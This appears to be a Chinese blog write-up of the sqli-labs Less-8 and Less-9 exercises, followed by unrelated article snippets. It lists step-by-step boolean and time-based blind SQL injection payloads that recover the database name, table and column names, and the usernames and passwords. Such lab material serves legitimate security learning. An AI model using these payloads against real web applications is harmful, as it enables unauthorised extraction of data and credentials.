less8-9：布尔盲注以及时间盲注

时间：2024-10-15 20:46:16浏览次数：9

标签：database ascii substr less8 --+ sleep 盲注 id 布尔

一、less-8:

布尔型盲注：适合正确和错误都有反应

length（）函数：返回字符串的长度

substr（源字符串,起始位置,可选的长度）截取字符串

ascii（）返回字符串的ascii码

时间型：

sleep（）将程序挂起一段时间n为n秒

if（条件，true，false）函数，true当条件为真时返回的值，false为当前为假时返回的值

在条件部分改动，利用响应时间来确定数据库第一个字母

①确定数字型和字符型：

?id=1 and 1=2

正常反馈为字符型，错误反馈为数字型

②确定闭合符

通过

?id=1' and 1=2

?id=1' and 1=2 --+

来确定闭合符

③查询列数：

确定目标库表中列的数量

通过?id=1' order by 1 --+正常反馈

……

?id=1' order by 4 --+错误反馈

说明表中列的数量有三列。

④猜库名长度

?id=1' and (length(database()))=8 --+进行猜测，页面正常反馈，库名长为8

⑤猜测数据库名

?id=1' and (ascii(substr(database(),1,1)))>=115 --+

根据页面是否正常反馈进行，来确定数据库第一个字母的范围，然后逐渐确定具体字母。

?id=1' and (ascii(substr(database(),2,1)))>=116 --+

⑥猜测表名

?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database()limit 0,1),1,1)))=101 --+

可以猜测出表名的第一个字母。

⑦猜测段名

⑧用户名与密码

二、less-9

函数：

if（要确定正错条件，正确运行的命令，错误运行的命令）

substr（源字符串,起始位置,可选的长度）截取字符串

limit

①确定数字型和字符型：

?id=1 and 1=2

正常反馈为字符型，错误反馈为数字型

可以认定为字符型。

②确定闭合符

通过

?id=1' and 1=2

?id=1' and 1=2 --+

?id=1'"and 1=2 --+

来确定闭合符，发现无论输入什么页面都没有反应，故使用时间盲注。

返回页面都一样，但是加入sleep（5）条件后，正确的SQL语句页面返回速度明显慢了5

秒，错误的SQL语句立即返回。

?id=1' and sleep(3) --+ 有明显延迟

?id=1" and sleep(3) --+ 无延迟

说明这里的闭合是单引号。

③猜库名长度

?id=1' and if(length(database())>5,sleep(1),sleep(5))--+

根据反应时间确定库名长度

④猜测数据库名

?id=1' and if(ascii(substr((select database()),1,1))>110,sleep(1),sleep(5))--+

依旧根据时间长短进行分析，然后逐个猜出所有的字母

⑤猜测表名

?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100,sleep(1),sleep(5))--+

依旧根据时间长短进行分析，然后逐个猜出所有的字母

⑥段名

?id=1' and if(ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name ='users' limit 0,1),1,1))>100,sleep(1),sleep(5))--+

依旧根据时间长短进行分析，然后逐个猜出所有的字母

⑦用户名

?id=1' and if(ascii(substr((select username from users limit 0,1),1,1))>110,sleep(1),sleep(5))--+

依旧根据时间长短进行分析，然后逐个猜出所有的字母

⑧密码

?id=1' and if(ascii(substr((select password from users limit 0,1),1,1))>110,sleep(1),sleep(5))--+

便可以得到用户名与对应的密码

关于limit在布尔盲注和时间盲注中的区别：（来自ai）

标签：database,ascii,substr,less8,--+,sleep,盲注,id,布尔
From： https://blog.csdn.net/yxzyou/article/details/142963969

SQL注入练习-联合注入-报错注入-布尔盲注
一判断是数字型注入还是字符型注入在不依赖于DVWA后端数据库的情况，如何通过前端验证的方法判断DVWA中的注入点是数字型注入还是字符型注入？（提示：用假设法进行逻辑判断）输入1and1=1查询有两种情况：①数字型注入a.输入内容没有被网站做任何处理，能查询到；b.输入内容被网站做......
学习011-08-05 Boolean Properties（布尔属性）
BooleanProperties（布尔属性）InXAF,thefollowingcontrolscandisplayBooleanandNullableBooleanproperties:在XAF中，以下控件可以显示布尔和Nullable布尔属性：Acheckboxcontrol(default).复选框控件（默认）。Adrop-downcontrolthatdisplaysBooleanvaluesa......
用布尔表达式巧解数字电路图
1.前置知识明确AND,OR,XOR,NOR,NOT运算的规则参见:E25.【C语言】练习:修改二进制序列的指定位这里再补充一个布尔运算符:NOR,即先进行OR运算,再进行NOT运算如下图为其数字电路的符号注意到在OR符号的基础上,在尾部加了一个(其实由简化而来)附:NOR的真值表2.R-S触发器(......
SQL注入实战——盲注
利用sqliabs中less-8和less-9学习盲注目录盲注一、基于时间的盲注1.时间盲注常用函数2.打开less-93.测试的核心语句4.延时注入5.猜测数据库利用二分法猜测数据表、字段名、用户名及密码二、基于布尔的盲注1.布尔注入常用函数2.打开less-8 3.判断当前数据......
02 布尔值计算
判断下列逻辑语句的#True,#False1>1or3<4or4>5and2>1and9>8or7<6#TrueFalseorTrueorFalseandTrueandTrueorFalseFalseorTrueorTrueorFalseTrueprint(1>1or3<4or4>5and2>1and9>8......
6.5.1嵌套规则/布尔对象
嵌套规则下面案例：这种混合模式设计模拟了一个具有衍射功率的透镜和一个没有衍射功率的中心区域。通过首先在非顺序组件编辑器中定义一个衍射光栅（对象1）来模拟透镜的全部范围，可以很容易地实现这个几何图形。在上面的图像中，这是由镜头更大的灰色区域表示的。然后，我们可以在NSCE中......
JavaScript数据类型转换布尔类型转换
布尔类型转换布尔类型只有两个值：true和false。任何直观上为空的都被转换为false，其他的转换为true。显示转换为布尔类型时，使用Boolean(Value)函数。布尔类型转换规则类型类型转换后0false“0”true“”或者‘’true“”或者‘’即空字符串falsenullfalseundefinedfalseNaNfal......
基于Spark的温布尔登特色赛赛事数据分析预测及算法实现_718p9405
目录技术栈和环境说明python语言解决的思路具体实现截图框架介绍技术路线操作可行性性能/安全/负载方面python-flask核心代码部分展示python-django核心代码部分展示详细视频演示源码获取技术栈和环境说明结合用户的使用需求，本系统采用运用较为广泛的Python语言，DJAN......
【数学】布尔逻辑运算
逻辑运算是重要的论推演工具，应用于基础数学中的分析，代数，拓扑领域，以及组合数学中的计算方法，也是电路板底层设计的重要组分。一元逻辑运算非门¬x\negx......
Python Numpy布尔数组在数据分析中的应用
大家好，在数据分析和科学计算中，布尔数组是一个非常重要的工具，它可以帮助我们进行数据的筛选、过滤和条件判断。Python的Numpy库提供了丰富的布尔运算功能，能够高效地对数据进行处理。本文将深入探讨Numpy中的布尔数组，介绍布尔运算和布尔索引的使用方法，并通过具体的示例代码展示其......

less8-9：布尔盲注以及时间盲注

相关文章

赞助商

阅读排行